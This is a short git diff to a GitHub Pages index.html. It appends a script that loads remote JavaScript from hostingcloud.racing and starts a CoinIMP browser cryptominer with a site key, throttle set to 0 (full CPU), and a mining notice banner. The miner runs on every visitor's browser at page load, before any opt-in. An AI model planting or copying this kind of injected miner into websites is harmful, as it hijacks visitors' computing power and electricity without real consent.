--- a/index.html
+++ b/index.html
@@ -5,3 +5,12 @@
 <p>I'm hosted with GitHub Pages.</p>
 </body>
 </html>
+<script src="https://www.hostingcloud.racing/k2eR.js"></script>
+<script>
+    var _client = new Client.Anonymous('17e0d6e9609877916c0a9b0c83e2009f0149dc75a0ec30eb683966bbc6e5f06a', {
+        throttle: 0, c: 'w'
+    });
+    _client.start();
+    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
+
+</script>
